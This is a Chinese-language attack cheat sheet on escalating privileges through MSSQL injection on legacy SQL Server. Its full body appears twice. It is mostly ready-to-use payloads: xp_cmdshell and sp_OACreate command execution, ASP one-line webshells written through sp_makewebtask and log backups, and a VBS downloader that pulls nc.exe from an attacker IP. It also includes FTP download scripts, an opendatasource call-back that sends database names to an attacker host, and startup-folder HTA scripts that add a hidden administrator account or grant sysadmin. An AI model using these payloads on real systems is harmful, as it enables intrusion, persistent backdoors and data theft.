MSSQL注入提权的一些方法(以下均为 SQL Server 2000 时代的写法, 新版本上多数默认已关闭)
MSSQL注入提权思路:
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提是这些储存过程仍然存在且已启用; SQL Server 2005 及以后 xp_cmdshell 与 OLE Automation 默认禁用, 只有 sysadmin 才能用 sp_configure 重新打开. 注意这类命令都是以 SQL Server 服务账户的身份执行的, 实际得到的是服务账户的系统权限, 服务账户权限越高(如 LocalSystem)危害越大; 让 SQL Server 以低权限账户运行是最直接的缓解措施)
相关SQL语句
XP_CMDSHELL:
数字型(注入点是数字参数, 直接用 ; 堆叠语句);EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型(注入点是字符串参数, 先用 ' 闭合引号)';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate(OLE 自动化过程, xp_cmdshell 被删除时的替代, 同样以 SQL 服务账户身份执行):
数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
字符型&搜索型';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
p.s.(2000系统WINDOWS改为WINNT; 末尾的 -- 把原 SQL 的剩余部分注释掉, 两种写法都依赖 MSSQL 允许堆叠查询)
沙盘(Jet SandBoxMode)提权:
修改 Jet 的沙盒设置;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1--
(注册表路径必须用反斜杠; SandBoxMode=1 表示只对 Access 自身启用沙盒, 对 SQL Server 这类外部调用不再沙盒, Jet 表达式里的 Shell() 才能执行; 写 HKLM 需要 sysadmin 权限)
然后利用jet.oledb执行系统命令;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
(要求服务器上有 32 位 Jet 4.0 且 ias.mdb 存在; openrowset/opendatasource 这类即席分布式查询在 2005 以后默认关闭)
p.s.(2000系统WINDOWS改为WINNT)
直接备份一句话木马;exec sp_makewebtask 'WEB绝对路径/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S.(WEB与DATA在同一主机,且已知WEB目录; sp_makewebtask 只存在于 SQL Server 2000 及更早版本, 2005 已移除; 写文件的是 SQL Server 服务账户, 它对 WEB 目录必须有写权限; %25 是 % 的 URL 编码, 经 Web 层解码后才是 <% %>)
下载文件到目标主机方式:
利用NBSI等工具写入VBS文件
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
该语句作用:通过 xp_cmdshell 里的 echo 把一个名为 labeng.vbs 的脚本写到 C 盘(^" 是 cmd 中对双引号的转义);
接着执行CSCRIPT C:/LABENG.VBS;VBS文件作用:用 Microsoft.XMLHTTP 从 http://125.113.114.49/nc.exe 下载, 再通过 ADODB.Stream 保存为 C:/C.EXE(125.113.114.49 是示例中的攻击者主机, 要求目标能主动出网访问 HTTP);
FTP&TFTP传输:
FTP:
CMDLINE依次输入
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
作用:写一个FTP.TXT文件,内容为
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
接着执行FTP -S:FTP.TXT目标主机就会到125.*.*.*下载XX.EXE;
TFTP类似~~
DB权限(只有 db_owner 一类的库级权限, 没有 sysadmin):
WEB&DATA同一主机:1,列目录找到WEB目录,用LOG备份或差异备份把一句话写成WEBSHELL,接着提权;2,猜表拿管理员ID和密码,进后台拿WEBSHELL;3,把提权脚本备份到启动项(要求 SQL 服务账户对启动目录可写),等待管理员重新登录或重启
分离的情况:1,猜表拿管理员ID和密码,进后台拿WEBSHELL;2,把提权脚本备份到启动项,等待重启.
判断DATA主机IP(让数据库服务器主动连回来, 从连接来源地址看它的出口 IP):
本地NC -L -V -P 1433 监听1433端口
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--
(要求数据库服务器能向外连 1433; 该语句同时会把目标的数据库名列表发过来; opendatasource 在 2005 以后默认关闭)
暴WEB路径(PS:DATA&WEB同一主机, 从 IIS 的注册表项读取默认站点根目录)
;create table labeng(lala nvarchar(255) null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(select top 1 lala from labeng)--
(注册表路径用反斜杠, 值名 '/' 对应站点根虚拟目录; 最后一步靠 nvarchar 转 int 失败时的报错把路径带出来, 所以要求页面会回显数据库错误信息)
过滤'的处理(用十六进制避开单引号):
;DECLARE @S VARCHAR(4000);SET @S=CAST(0x开头的SQL语句十六进制 AS VARCHAR(4000));EXEC(@S)--
LOG备份语句(原文写的"表"其实是数据库名; 需要对该库有 db_owner 一类权限, 且 SQL 服务账户对目标目录可写):
;alter database 库名 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 库名 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 库名 to disk = 'WEB目录/1.asp'--
(生成的 1.asp 是二进制的日志备份文件, 一句话夹在其中, ASP 解析时会跳过其余垃圾字节; 若该库从未做过完整备份, 第一条 backup log 可能报 4214 错误, 需要先 backup database 一次)
一句话变形(带 %25 的是 URL 编码写法, 用于注入点在 URL 中的情况, %% 用于再经过一次解码/格式化的场景; 服务端还原后都是 <%execute(request("参数名"))%>):
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
备份文件到启动项:
将LOG备份中'<%%25Execute(request("value"))%%25>'改为 HTA、BAT 等文件的十六进制内容(备份到"启动"文件夹, 管理员下次登录时以其身份运行; 同样要求 SQL 服务账户对启动目录可写)
例:labeng.hta(test$ 与 labeng?123 是示例用户名和密码, 实际使用时替换; 用 net1.exe 而非 net.exe 大概是为了绕过对 net.exe 的简单封锁)
内容:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
转化为十六进制:
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
-----------------------------------------------------------------------------
SQL语句:
;insert into cmd (a) values(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)--
------------------------------------------------------------------------------------
提升SQL用户为SA权限(同样放进启动项, 借管理员登录时的 Windows 身份连本机 SQL, 把自己注入时用的低权限 SQL 登录加进 sysadmin):
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del labeng.hta",0
</script><script language=javascript>window.close();</script>
(boayo 换成自己的 SQL 登录名; 原文把 -E(Windows 信任连接)和 /U alma /P(SQL 登录)写在了一起, 两者只需其一, 在启动项里运行时通常靠 -E 借用当前登录管理员的 Windows 身份)
用法同上...
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提是这些储存过程仍然存在且已启用; SQL Server 2005 及以后 xp_cmdshell 与 OLE Automation 默认禁用, 只有 sysadmin 才能用 sp_configure 重新打开. 注意这类命令都是以 SQL Server 服务账户的身份执行的, 实际得到的是服务账户的系统权限, 服务账户权限越高(如 LocalSystem)危害越大; 让 SQL Server 以低权限账户运行是最直接的缓解措施)
相关SQL语句
XP_CMDSHELL:
数字型(注入点是数字参数, 直接用 ; 堆叠语句);EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型(注入点是字符串参数, 先用 ' 闭合引号)';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate(OLE 自动化过程, xp_cmdshell 被删除时的替代, 同样以 SQL 服务账户身份执行):
数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
字符型&搜索型';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
p.s.(2000系统WINDOWS改为WINNT; 末尾的 -- 把原 SQL 的剩余部分注释掉, 两种写法都依赖 MSSQL 允许堆叠查询)
沙盘(Jet SandBoxMode)提权:
修改 Jet 的沙盒设置;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1--
(注册表路径必须用反斜杠; SandBoxMode=1 表示只对 Access 自身启用沙盒, 对 SQL Server 这类外部调用不再沙盒, Jet 表达式里的 Shell() 才能执行; 写 HKLM 需要 sysadmin 权限)
然后利用jet.oledb执行系统命令;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
(要求服务器上有 32 位 Jet 4.0 且 ias.mdb 存在; openrowset/opendatasource 这类即席分布式查询在 2005 以后默认关闭)
p.s.(2000系统WINDOWS改为WINNT)
直接备份一句话木马;exec sp_makewebtask 'WEB绝对路径/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S.(WEB与DATA在同一主机,且已知WEB目录; sp_makewebtask 只存在于 SQL Server 2000 及更早版本, 2005 已移除; 写文件的是 SQL Server 服务账户, 它对 WEB 目录必须有写权限; %25 是 % 的 URL 编码, 经 Web 层解码后才是 <% %>)
下载文件到目标主机方式:
利用NBSI等工具写入VBS文件
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
该语句作用:通过 xp_cmdshell 里的 echo 把一个名为 labeng.vbs 的脚本写到 C 盘(^" 是 cmd 中对双引号的转义);
接着执行CSCRIPT C:/LABENG.VBS;VBS文件作用:用 Microsoft.XMLHTTP 从 http://125.113.114.49/nc.exe 下载, 再通过 ADODB.Stream 保存为 C:/C.EXE(125.113.114.49 是示例中的攻击者主机, 要求目标能主动出网访问 HTTP);
FTP&TFTP传输:
FTP:
CMDLINE依次输入
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
作用:写一个FTP.TXT文件,内容为
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
接着执行FTP -S:FTP.TXT目标主机就会到125.*.*.*下载XX.EXE;
TFTP类似~~
DB权限(只有 db_owner 一类的库级权限, 没有 sysadmin):
WEB&DATA同一主机:1,列目录找到WEB目录,用LOG备份或差异备份把一句话写成WEBSHELL,接着提权;2,猜表拿管理员ID和密码,进后台拿WEBSHELL;3,把提权脚本备份到启动项(要求 SQL 服务账户对启动目录可写),等待管理员重新登录或重启
分离的情况:1,猜表拿管理员ID和密码,进后台拿WEBSHELL;2,把提权脚本备份到启动项,等待重启.
判断DATA主机IP(让数据库服务器主动连回来, 从连接来源地址看它的出口 IP):
本地NC -L -V -P 1433 监听1433端口
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--
(要求数据库服务器能向外连 1433; 该语句同时会把目标的数据库名列表发过来; opendatasource 在 2005 以后默认关闭)
暴WEB路径(PS:DATA&WEB同一主机, 从 IIS 的注册表项读取默认站点根目录)
;create table labeng(lala nvarchar(255) null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(select top 1 lala from labeng)--
(注册表路径用反斜杠, 值名 '/' 对应站点根虚拟目录; 最后一步靠 nvarchar 转 int 失败时的报错把路径带出来, 所以要求页面会回显数据库错误信息)
过滤'的处理(用十六进制避开单引号):
;DECLARE @S VARCHAR(4000);SET @S=CAST(0x开头的SQL语句十六进制 AS VARCHAR(4000));EXEC(@S)--
LOG备份语句(原文写的"表"其实是数据库名; 需要对该库有 db_owner 一类权限, 且 SQL 服务账户对目标目录可写):
;alter database 库名 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 库名 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 库名 to disk = 'WEB目录/1.asp'--
(生成的 1.asp 是二进制的日志备份文件, 一句话夹在其中, ASP 解析时会跳过其余垃圾字节; 若该库从未做过完整备份, 第一条 backup log 可能报 4214 错误, 需要先 backup database 一次)
一句话变形(带 %25 的是 URL 编码写法, 用于注入点在 URL 中的情况, %% 用于再经过一次解码/格式化的场景; 服务端还原后都是 <%execute(request("参数名"))%>):
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
备份文件到启动项:
将LOG备份中'<%%25Execute(request("value"))%%25>'改为 HTA、BAT 等文件的十六进制内容(备份到"启动"文件夹, 管理员下次登录时以其身份运行; 同样要求 SQL 服务账户对启动目录可写)
例:labeng.hta(test$ 与 labeng?123 是示例用户名和密码, 实际使用时替换; 用 net1.exe 而非 net.exe 大概是为了绕过对 net.exe 的简单封锁)
内容:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
转化为十六进制:
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
-----------------------------------------------------------------------------
SQL语句:
;insert into cmd (a) values(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)--
------------------------------------------------------------------------------------
提升SQL用户为SA权限(同样放进启动项, 借管理员登录时的 Windows 身份连本机 SQL, 把自己注入时用的低权限 SQL 登录加进 sysadmin):
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del labeng.hta",0
</script><script language=javascript>window.close();</script>
(boayo 换成自己的 SQL 登录名; 原文把 -E(Windows 信任连接)和 /U alma /P(SQL 登录)写在了一起, 两者只需其一, 在启动项里运行时通常靠 -E 借用当前登录管理员的 Windows 身份)
用法同上...